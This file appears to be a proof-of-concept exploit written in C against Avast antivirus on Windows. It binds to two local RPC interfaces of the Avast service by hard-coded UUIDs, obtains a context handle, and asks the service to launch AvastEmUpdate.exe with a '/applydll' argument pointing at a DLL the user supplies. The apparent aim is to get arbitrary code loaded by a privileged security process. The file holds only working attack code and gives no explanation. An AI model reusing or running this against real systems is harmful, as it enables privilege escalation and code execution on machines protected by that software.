#define _UNICODE
#define UNICODE
#include <windows.h>
#include <tchar.h>
#include <rpc.h>
#include <strsafe.h>
#include "aswpatchmgmt.h"
#include "aavm4.h"
#pragma comment( lib, "rpcrt4.lib" )
void __RPC_FAR * __RPC_USER midl_user_allocate( size_t cBytes )
{
return ( ( void __RPC_FAR * )LocalAlloc( LPTR, cBytes ) );
}
void __RPC_USER midl_user_free( void __RPC_FAR * p )
{
LocalFree( p );
}
int _tmain( int argc, TCHAR *argv[] )
{
RPC_STATUS RpcStatus;
TCHAR *StringBinding = NULL;
RPC_BINDING_HANDLE RpcBindingHandle_PatchMgmt = NULL;
RPC_BINDING_HANDLE RpcBindingHandle_Aavm4 = NULL;;
LONG lResult, lReturn;
INT i;
PVOID pContextHandle = NULL;
TCHAR szDllPath[MAX_PATH], szCommandLine[MAX_PATH];
if ( argc != 2 )
return 0;
if ( GetCurrentDirectory( _countof( szDllPath ),
szDllPath ) == 0 )
{
_tprintf( _T( "[-] GetCurrentDirectory() failed with error 0x%08x\n" ),
GetLastError() );
return 0;
}
if ( FAILED( StringCchCat( szDllPath,
_countof( szDllPath ),
_T( "\\" ) ) ) )
return 0;
if ( FAILED( StringCchCat( szDllPath,
_countof( szDllPath ),
argv[1] ) ) )
return 0;
if ( FAILED( StringCchCopy( szCommandLine,
_countof( szCommandLine ),
_T( "/applydll " ) ) ) )
return 0;
if ( FAILED( StringCchCat( szCommandLine,
_countof( szCommandLine ),
szDllPath ) ) )
return 0;
RpcStatus = RpcStringBindingCompose( _T( "dbe95f8e-2be7-4b70-96f3-369be27fa432" ),
_T( "ncalrpc" ),
NULL,
_T( "[Aavm]" ),
NULL,
&StringBinding );
if ( RPC_S_OK != RpcStatus )
{
_tprintf( _T( "[-] RpcStringBindingCompose() failed (0x%08x)\n" ),
RpcStatus );
goto CleanUp;
}
_tprintf( _T( "[?] %s\n" ), StringBinding );
RpcStatus = RpcBindingFromStringBinding( StringBinding,
&RpcBindingHandle_PatchMgmt );
RpcStringFree( &StringBinding );
if ( RPC_S_OK != RpcStatus )
{
_tprintf( _T( "[-] RpcBindingFromStringBinding() failed (0x%08x)\n" ),
RpcStatus );
goto CleanUp;
}
RpcStatus = RpcStringBindingCompose( _T( "eb915940-6276-11d2-b8e7-006097c59f07" ),
_T( "ncalrpc" ),
NULL,
_T( "[Aavm]" ),
NULL,
&StringBinding );
if ( RPC_S_OK != RpcStatus )
{
_tprintf( _T( "[-] RpcStringBindingCompose() failed (0x%08x)\n" ),
RpcStatus );
goto CleanUp;
}
_tprintf( _T( "[?] %s\n" ), StringBinding );
RpcStatus = RpcBindingFromStringBinding( StringBinding,
&RpcBindingHandle_Aavm4 );
if ( RPC_S_OK != RpcStatus )
{
_tprintf( _T( "[-] RpcBindingFromStringBinding() failed (0x%08x)\n" ),
RpcStatus );
goto CleanUp;
}
RpcTryExcept
{
lResult = sub_1001AB90( RpcBindingHandle_PatchMgmt,
&pContextHandle );
_tprintf( _T( "[!] sub_1001AB90() returned 0x%08x (0x%08x)\n" ),
lResult,
pContextHandle );
}
RpcExcept( 1 )
{
_tprintf( _T( "[-] An RPC exception has occurred (0x%08x)\n" ),
RpcExceptionCode() );
}
RpcEndExcept
RpcTryExcept
{
lResult = sub_6500CC10( RpcBindingHandle_Aavm4,
pContextHandle,
2, //AvastEmUpdate.exe
szCommandLine,
&lReturn );
_tprintf( _T( "[!] sub_6500CC10() returned 0x%08x\n" ),
lResult );
}
RpcExcept( 1 )
{
_tprintf( _T( "[-] An RPC exception has occurred (0x%08x)\n" ),
RpcExceptionCode() );
}
RpcEndExcept
CleanUp:
if ( NULL != RpcBindingHandle_Aavm4 )
{
RpcBindingFree( &RpcBindingHandle_Aavm4 );
}
if ( NULL != RpcBindingHandle_PatchMgmt )
{
RpcBindingFree( &RpcBindingHandle_PatchMgmt );
}
if ( NULL != StringBinding )
{
RpcStringFree( &StringBinding );
}
return 0;
}